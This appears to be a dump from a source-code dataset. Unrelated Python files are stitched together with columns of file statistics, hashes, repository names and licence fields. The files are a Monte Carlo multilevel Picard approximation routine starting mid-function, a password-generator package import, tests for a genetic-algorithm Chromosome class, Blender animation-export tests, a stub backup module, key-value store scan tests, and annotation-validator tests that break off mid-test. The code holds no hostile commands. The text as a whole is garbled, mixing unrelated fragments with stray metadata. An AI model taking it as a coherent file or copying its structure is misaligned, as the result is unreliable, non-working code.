        rhs_f = rhs_f + rhs_f_threads.reshape(self.eqn_config.dim_system, self.mlp.dim + 1)
        for l in range(n - num_workers, -1, -1):
            rhs_f = rhs_f + results[l]
    else:
        # Single-core version of the MLP approximation algorithm.
        rhs_g = np.zeros(shape=(self.eqn_config.dim_system, 1))
        rhs_f = np.zeros(shape=(self.eqn_config.dim_system, 1))
        rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system, 1))
        # Monte Carlo sum involving the terminal condition g.
        for i in range(M**n):
            # sample state
            if advanced[0] is None:
                (dX, dW) = dXsample(t_approx, self.mlp.total_time, x)
                dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
            else:
                dW = load_mlp_generateSamples(samples=advanced[0],
                                              pos_index=(advanced[2], 1, 0, i),
                                              hist_index=advanced[1],
                                              config=self.mlp.sampleNeeded)
                dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
                dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
            rhs_g = rhs_g + (g(dX[-1]) - g(x)) * dI
        rhs_g = np.insert(np.zeros((self.eqn_config.dim_system, self.mlp.dim)), 0, g(x).flatten(), axis=1) + (rhs_g / (M**n))
        # Monte Carlo sum involving the difference of the nonlinearity f.
        ## Case l = 0: f is evaluated at the zeroth Picard iterate (which is zero).
        for i in range(M**n):
            # sample state; the intermediate time R is drawn from a power
            # distribution on [t_approx, T].
            if advanced[0] is None:
                r = np.random.power(self.eqn_config.time_dist_exponent, 1)
                R = t_approx + (self.mlp.total_time - t_approx) * r
                (dX, dW) = dXsample(t_approx, R, x)
                dI = dIsample(t_approx, R, x, dW, dX)
            else:
                r = advanced[0][(advanced[2], 2, 0, i, 0) + advanced[1]]
                R = t_approx + (self.mlp.total_time - t_approx) * r
                dW = load_mlp_generateSamples(samples=advanced[0],
                                              pos_index=(advanced[2], 2, 0, i),
                                              hist_index=advanced[1],
                                              config=self.mlp.sampleNeeded)
                dX = dXsample(t_approx, R, x, dW)[0]
                dI = dIsample(t_approx, R, x, dW, dX)
            rhs_f_diff = rhs_f_diff + (r**(1 - self.eqn_config.time_dist_exponent)) * f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, 0, M, dX[-1], R, False, advanced)) * dI
        rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**n)))
        ## Case l > 0: telescoping differences between consecutive Picard iterates.
        for l in range(1, n):
            rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system, 1))
            for i in range(M**(n - l)):
                if advanced[0] is None:
                    r = np.random.power(self.eqn_config.time_dist_exponent, 1)
                    R = t_approx + (self.mlp.total_time - t_approx) * r
                    (dX, dW) = dXsample(t_approx, R, x)
                    dI = dIsample(t_approx, R, x, dW, dX)
                    rhs_f_diff = (rhs_f_diff
                                  + ((r**(1 - self.eqn_config.time_dist_exponent))
                                     * (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, advanced))
                                        - f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l - 1, M, dX[-1], R, False, advanced)))) * dI)
                else:
                    r = advanced[0][(advanced[2], 2, l, i, 0) + advanced[1]]
                    R = t_approx + (self.mlp.total_time - t_approx) * r
                    dW = load_mlp_generateSamples(samples=advanced[0],
                                                  pos_index=(advanced[2], 2, l, i),
                                                  hist_index=advanced[1],
                                                  config=self.mlp.sampleNeeded)
                    dX = dXsample(t_approx, R, x, dW)[0]
                    dI = dIsample(t_approx, R, x, dW, dX)
                    # In advanced mode the history index and level are extended so
                    # that nested calls address their own pre-generated samples.
                    rhs_f_diff = (rhs_f_diff
                                  + ((r**(1 - self.eqn_config.time_dist_exponent))
                                     * (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, [advanced[0], advanced[1] + (i, l,), advanced[2] + 1]))
                                        - f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l - 1, M, dX[-1], R, False, [advanced[0], advanced[1] + (i, -(l - 1),), advanced[2] + 1])))) * dI)
            rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**(n - l))))
    return rhs_g.reshape((self.mlp.dim_system, self.mlp.dim + 1)) + rhs_f.reshape((self.mlp.dim_system, self.mlp.dim + 1))
| 55.583554
| 193
| 0.486543
| 4,914
| 41,910
| 4.020554
| 0.063085
| 0.047831
| 0.02961
| 0.029154
| 0.853065
| 0.838994
| 0.826998
| 0.81313
| 0.805892
| 0.791922
| 0
| 0.016927
| 0.413601
| 41,910
| 753
| 194
| 55.657371
| 0.786987
| 0.239203
| 0
| 0.727711
| 1
| 0.00241
| 0.011193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021687
| false
| 0.00241
| 0.014458
| 0
| 0.06506
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83cbf328038856a6fe5fedc04da5420b54ba6d82
| 160
|
py
|
Python
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 2
|
2018-04-27T17:52:10.000Z
|
2018-04-27T19:36:13.000Z
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 2
|
2018-04-27T13:56:53.000Z
|
2018-04-27T21:46:01.000Z
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 1
|
2018-04-27T20:55:39.000Z
|
2018-04-27T20:55:39.000Z
|
from spass.generators import generate_random_password, generate_passphrase
from spass.exceptions import ParameterError
from spass.mapper import update_word_map
| 40
| 74
| 0.89375
| 21
| 160
| 6.571429
| 0.666667
| 0.195652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08125
| 160
| 3
| 75
| 53.333333
| 0.938776
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f7a8dcf43a6accff0679bc55f95631958e573ba7
| 6,384
|
py
|
Python
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 10
|
2020-07-24T22:04:51.000Z
|
2022-03-25T06:09:48.000Z
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 12
|
2021-04-30T09:53:18.000Z
|
2022-02-25T04:16:02.000Z
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 1
|
2021-11-25T13:12:32.000Z
|
2021-11-25T13:12:32.000Z
|
"""Tests of chromosome.py
"""
import unittest
from reversi.genetic_algorithm import Chromosome
class TestChromosome(unittest.TestCase):
    """chromosome

    Each sub-test defines a subclass of Chromosome that omits exactly one
    method and checks that instantiating the incomplete subclass raises
    TypeError, while a subclass overriding every method can be instantiated.
    (The TypeError-on-instantiation pattern suggests Chromosome is an abstract
    base class -- confirm against chromosome.py.)
    """
    def test_chromosome(self):
        # The methods can be invoked on the class itself with dummy arguments;
        # only instantiation of an incomplete subclass is expected to fail.
        Chromosome.fitness("self")
        Chromosome.reset_fitness("self")
        Chromosome.is_optimal("self")
        Chromosome.random_instance()
        Chromosome.crossover("self", "other")
        Chromosome.mutate("self")
        Chromosome.large_mutate("self")
        # Subclass overriding nothing: instantiation must fail.
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                pass
            test = Test()
        # Subclass missing fitness().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def reset_fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def random_instance(cls):
                    pass
                def crossover(self, other):
                    pass
                def mutate(self):
                    pass
                def large_mutate(self):
                    pass
            Test.reset_fitness("self")
            Test.is_optimal("self")
            Test.random_instance("cls")
            Test.crossover("self", "other")
            Test.mutate("self")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing reset_fitness().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def random_instance(cls):
                    pass
                def crossover(self, other):
                    pass
                def mutate(self):
                    pass
                def large_mutate(self):
                    pass
            Test.fitness("self")
            Test.is_optimal("self")
            Test.random_instance("cls")
            Test.crossover("self", "other")
            Test.mutate("self")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing is_optimal().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def reset_fitness(self):
                    pass
                def random_instance(cls):
                    pass
                def crossover(self, other):
                    pass
                def mutate(self):
                    pass
                def large_mutate(self):
                    pass
            Test.fitness("self")
            Test.reset_fitness("self")
            Test.random_instance("cls")
            Test.crossover("self", "other")
            Test.mutate("self")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing random_instance().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def reset_fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def crossover(self, other):
                    pass
                def mutate(self):
                    pass
                def large_mutate(self):
                    pass
            Test.fitness("self")
            Test.reset_fitness("self")
            Test.is_optimal("self")
            Test.crossover("self", "other")
            Test.mutate("self")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing crossover().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def reset_fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def random_instance(cls):
                    pass
                def mutate(self):
                    pass
                def large_mutate(self):
                    pass
            Test.fitness("self")
            Test.reset_fitness("self")
            Test.is_optimal("self")
            Test.random_instance("cls")
            Test.mutate("self")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing mutate().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def reset_fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def random_instance(cls):
                    pass
                def crossover(self, other):
                    pass
                def large_mutate(self):
                    pass
            Test.fitness("self")
            Test.reset_fitness("self")
            Test.is_optimal("self")
            Test.random_instance("cls")
            Test.crossover("self", "other")
            Test.large_mutate("self")
            test = Test()
        # Subclass missing large_mutate().
        with self.assertRaises(TypeError):
            class Test(Chromosome):
                def fitness(self):
                    pass
                def reset_fitness(self):
                    pass
                def is_optimal(self):
                    pass
                def random_instance(cls):
                    pass
                def crossover(self, other):
                    pass
                def mutate(self):
                    pass
            Test.fitness("self")
            Test.reset_fitness("self")
            Test.is_optimal("self")
            Test.random_instance("cls")
            Test.crossover("self", "other")
            Test.mutate("self")
            test = Test()
        # Subclass overriding every method: instantiation succeeds.
        class Test(Chromosome):
            def fitness(self):
                pass
            def reset_fitness(self):
                pass
            def is_optimal(self):
                pass
            def random_instance(cls):
                pass
            def crossover(self, other):
                pass
            def mutate(self):
                pass
            def large_mutate(self):
                pass
        Test.fitness("self")
        Test.reset_fitness("self")
        Test.is_optimal("self")
        Test.random_instance("cls")
        Test.crossover("self", "other")
        Test.mutate("self")
        Test.large_mutate("self")
        test = Test()
        self.assertIsInstance(test, Test)
| 24.45977
| 48
| 0.441259
| 541
| 6,384
| 5.092421
| 0.05915
| 0.104174
| 0.107804
| 0.09147
| 0.874773
| 0.874773
| 0.874773
| 0.85735
| 0.85735
| 0.85735
| 0
| 0
| 0.469925
| 6,384
| 260
| 49
| 24.553846
| 0.814125
| 0.005952
| 0
| 0.935484
| 0
| 0
| 0.039943
| 0
| 0
| 0
| 0
| 0
| 0.048387
| 1
| 0.268817
| false
| 0.268817
| 0.010753
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
f7b1cecb08c0ddb5c25b481117391c4bac7b25cb
| 7,013
|
py
|
Python
|
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
tests/cases/test_anm_export.py
|
clayne/blender-xray
|
84d5d52049ec9e22c85ba8544995bd39c3a83e55
|
[
"BSD-2-Clause"
] | null | null | null |
import re
import bpy
from tests import utils
class TestAnmExport(utils.XRayTestCase):
    """Tests of the X-Ray *.anm animation export operator (bpy.ops.xray_export.anm)."""
    def test_yxz(self):
        # Export an object with an empty action and default rotation mode;
        # the output file must be produced.
        # Arrange
        obj = self._create_active_object()
        act = bpy.data.actions.new('tact')
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(filepath=self.outpath('Cube1.anm'), )
        # Assert
        self.assertOutputFiles({
            'Cube1.anm'
        })
    def test_has_no_rot(self):
        # Only location F-curves are keyed: the exporter must report that the
        # action does not have keys for all channels.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
        self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
    def test_has_no_loc(self):
        # Only rotation F-curves are keyed: same "not for all channels" error.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
        self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
    def test_has_no_loc_rot(self):
        # No F-curves at all: same "not for all channels" error.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
        self.assertReportsContains('ERROR', re.compile('Action has keys not for all channels'))
    def test_custom_refine(self):
        # Export with xray.autobake_custom_refine enabled on the action.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        act.xray.autobake_custom_refine = True
        obj.animation_data_create().action = act
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
    def test_bake_on(self):
        # Export with both autobake_custom_refine and autobake_on enabled.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        act.xray.autobake_custom_refine = True
        act.xray.autobake_on = True
        obj.animation_data_create().action = act
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
    def test_color_keys(self):
        # Export with additional 'color' F-curves alongside location/rotation.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        obj.animation_data_create().action = act
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
            fcu = act.fcurves.new('color', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu.keyframe_points.insert(10, 1)
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
    def test_ok(self):
        # Location and rotation both keyed: export succeeds and writes the file.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test.anm'),
        )
        # Assert
        self.assertOutputFiles({
            'test.anm'
        })
    def test_v3(self):
        # Export with explicit format_version='3'.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test_v3.anm'),
            format_version='3'
        )
        # Assert
        self.assertOutputFiles({
            'test_v3.anm'
        })
    def test_v4(self):
        # Export with explicit format_version='4'.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test_v4.anm'),
            format_version='4'
        )
        # Assert
        self.assertOutputFiles({
            'test_v4.anm'
        })
    def test_v5(self):
        # Export with explicit format_version='5'.
        # Arrange
        obj = self._create_active_object()
        obj.rotation_mode = 'YXZ'
        act = bpy.data.actions.new('tact')
        for i in range(3):
            fcu = act.fcurves.new('location', index=i)
            fcu.keyframe_points.insert(1, 0)
            fcu = act.fcurves.new('rotation_euler', index=i)
            fcu.keyframe_points.insert(1, 0)
        obj.animation_data_create().action = act
        # Act
        bpy.ops.xray_export.anm(
            filepath=self.outpath('test_v5.anm'),
            format_version='5'
        )
        # Assert
        self.assertOutputFiles({
            'test_v5.anm'
        })
    def _create_active_object(self):
        # Helper: create an empty object, link it to the scene and make it active.
        obj = bpy.data.objects.new('tobj', None)
        utils.link_object(obj)
        utils.set_active_object(obj)
        return obj
| 29.590717
| 95
| 0.563667
| 857
| 7,013
| 4.43874
| 0.098016
| 0.069401
| 0.107256
| 0.14511
| 0.86409
| 0.86409
| 0.86409
| 0.854627
| 0.854627
| 0.854627
| 0
| 0.016264
| 0.316127
| 7,013
| 236
| 96
| 29.716102
| 0.776897
| 0.02367
| 0
| 0.738095
| 0
| 0
| 0.078164
| 0
| 0
| 0
| 0
| 0
| 0.047619
| 1
| 0.071429
| false
| 0
| 0.017857
| 0
| 0.10119
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f7c6c10f2f5b80e140035ee3e4f3e9b75afc73e0
| 30
|
py
|
Python
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 4
|
2018-09-20T09:49:41.000Z
|
2020-04-08T23:27:12.000Z
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 1
|
2021-05-14T15:29:01.000Z
|
2021-05-14T15:29:01.000Z
|
tests/tes_okex_ws_spot_client.py
|
hhstore/py-crypto-exchange-apis
|
5164dc01de5691f10a521f037028032e3128e5e0
|
[
"MIT"
] | 2
|
2021-05-14T15:28:58.000Z
|
2021-05-17T06:11:21.000Z
|
from pprint import pprint
| 5
| 25
| 0.733333
| 4
| 30
| 5.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266667
| 30
| 5
| 26
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
f75c3dd62939d647ef1c79a9023e4238aa9dc3d5
| 157
|
py
|
Python
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 9
|
2020-04-29T16:31:39.000Z
|
2021-12-19T01:18:21.000Z
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 7
|
2020-04-29T16:43:17.000Z
|
2022-02-19T07:04:59.000Z
|
flask-microservice/api/util/backup_handlers.py
|
sashaobucina/coronatracker
|
236a1130977987eb90cf15973e4367d5f079dc7d
|
[
"MIT"
] | 2
|
2020-05-18T05:25:37.000Z
|
2020-08-07T09:02:33.000Z
|
def load_from_backup():
    """Load previously saved data from the backup store.

    Placeholder -- not implemented yet.
    """
    # TODO
    pass
def save_to_backup():
    """Persist the current data to the backup store.

    Placeholder -- not implemented yet.
    """
    # TODO
    pass
if __name__ == "__main__":
    # Module is import-only for now; running it as a script does nothing.
    pass
| 9.8125
| 26
| 0.471338
| 16
| 157
| 3.875
| 0.6875
| 0.322581
| 0.451613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.369427
| 157
| 16
| 27
| 9.8125
| 0.626263
| 0.057325
| 0
| 0.5
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0.333333
| true
| 0.5
| 0
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
f75e11209704b4c1ca00d10b546afdd97cf2b6e8
| 1,618
|
py
|
Python
|
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
tests/test_scan.py
|
eruvanos/dynafile
|
207425b073a963b01c677b697e74842b429c004a
|
[
"MIT"
] | null | null | null |
from _operator import itemgetter
from dynafile import Dynafile
def test_scan_all_items(tmp_path):
    """An unfiltered scan yields every stored item."""
    db = Dynafile(tmp_path / "db")
    # Three items under partition "1" and one under partition "2".
    for pk, sk in (("1", "aa"), ("1", "ab"), ("1", "ac"), ("2", "ba")):
        db.put_item(item={"PK": pk, "SK": sk})
    sort_keys = {item["SK"] for item in db.scan()}
    assert sort_keys == {"aa", "ab", "ac", "ba"}
def test_scan_with_callable_filter(tmp_path):
    """A callable filter restricts the scan to matching items."""
    db = Dynafile(tmp_path / "db")
    for pk, sk in (("1", "aa"), ("1", "ab"), ("1", "ac"), ("2", "ba")):
        db.put_item(item={"PK": pk, "SK": sk})

    def starts_with_a(item):
        # Keep only items whose sort key begins with "a".
        return item["SK"].startswith("a")

    sort_keys = {item["SK"] for item in db.scan(_filter=starts_with_a)}
    assert sort_keys == {"aa", "ab", "ac"}
def test_scan_with_string_filter(tmp_path):
    """A string filter expression restricts the scan to matching items."""
    db = Dynafile(tmp_path / "db")
    for pk, sk in (("1", "aa"), ("1", "ab"), ("1", "ac"), ("2", "ba")):
        db.put_item(item={"PK": pk, "SK": sk})
    sort_keys = {item["SK"] for item in db.scan(_filter="SK =~ /^a/")}
    assert sort_keys == {"aa", "ab", "ac"}
| 17.212766
| 90
| 0.434487
| 213
| 1,618
| 3.150235
| 0.159624
| 0.089419
| 0.160954
| 0.232489
| 0.789866
| 0.764531
| 0.710879
| 0.710879
| 0.710879
| 0.710879
| 0
| 0.011374
| 0.34796
| 1,618
| 93
| 91
| 17.397849
| 0.624645
| 0
| 0
| 0.716216
| 0
| 0
| 0.079728
| 0
| 0
| 0
| 0
| 0
| 0.040541
| 1
| 0.040541
| false
| 0
| 0.027027
| 0
| 0.067568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e3ac9a9ddb455964e828dc6fcf1722aed5bbcca6
| 103,716
|
py
|
Python
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 26
|
2020-09-25T06:25:06.000Z
|
2022-01-30T16:44:07.000Z
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 12
|
2020-12-21T19:59:48.000Z
|
2022-01-21T10:32:07.000Z
|
tests/unit/test_validators.py
|
dshabin/superannotate-python-sdk
|
3f2d7c5eed1fd7bb2990fcb0041a36803b10a115
|
[
"MIT"
] | 11
|
2020-09-17T13:39:19.000Z
|
2022-03-02T18:12:29.000Z
|
import json
import os
from os.path import dirname
import tempfile
import src.superannotate as sa
from tests.utils.helpers import catch_prints
from src.superannotate.lib.core.entities.utils import TimedBaseModel
from src.superannotate.lib.core.entities.pixel import PixelAnnotationPart
from pydantic import ValidationError
from unittest import TestCase
VECTOR_ANNOTATION_JSON_WITH_BBOX = """
{
"metadata": {
"name": "example_image_1.jpg",
"width": 1024,
"height": 683,
"status": "Completed",
"pinned": false,
"isPredicted": null,
"projectId": null,
"annotatorEmail": null,
"qaEmail": null
},
"instances": [
{
"type": "bbox",
"classId": 72274,
"probability": 100,
"points": {
"x2": 465.23,
"y1": 341.5,
"y2": 357.09
},
"groupId": 0,
"pointLabels": {},
"locked": false,
"visible": false,
"attributes": [
{
"id": 117845,
"groupId": 28230,
"name": "2",
"groupName": "Num doors"
}
],
"trackingId": "aaa97f80c9e54a5f2dc2e920fc92e5033d9af45b",
"error": null,
"createdAt": null,
"createdBy": null,
"creationType": null,
"updatedAt": null,
"updatedBy": null,
"className": "Personal vehicle"
}
]
}
"""
class TestValidators(TestCase):
    """Tests of sa.validate_annotations and the pydantic annotation entities."""

    TEST_VECTOR_FOLDER_PATH = "data_set/sample_project_vector"
    VECTOR_JSON = "example_image_1.jpg___objects.json"

    @property
    def vector_folder_path(self):
        # Absolute path to the bundled sample vector project, resolved two
        # directory levels above this test file.
        return os.path.join(dirname(dirname(__file__)), self.TEST_VECTOR_FOLDER_PATH)

    def test_validate_annotations_should_note_raise_errors(self):
        # A known-good vector annotation file validates cleanly.
        # NOTE(review): "note" in the method name looks like a typo for "not";
        # left unchanged so selections of this test by name keep working.
        sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, self.VECTOR_JSON))

    def test_validate_annotation_with_wrong_bbox(self):
        # A bbox instance missing points.x1 must be reported as a missing field.
        with tempfile.TemporaryDirectory() as tmpdir_name:
            with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
                vector_json.write(VECTOR_ANNOTATION_JSON_WITH_BBOX)
            with catch_prints() as out:
                sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
            self.assertIn("instances[0].points.x1fieldrequired", out.getvalue().strip().replace(" ", ""))

    def test_validate_annotation_without_metadata(self):
        # An annotation file without a "metadata" object must be reported.
        with tempfile.TemporaryDirectory() as tmpdir_name:
            with open(f"{tmpdir_name}/vector.json", "w") as vector_json:
                vector_json.write(
                    json.dumps({"instances": []})
                )
            with catch_prints() as out:
                sa.validate_annotations("Vector", os.path.join(self.vector_folder_path, f"{tmpdir_name}/vector.json"))
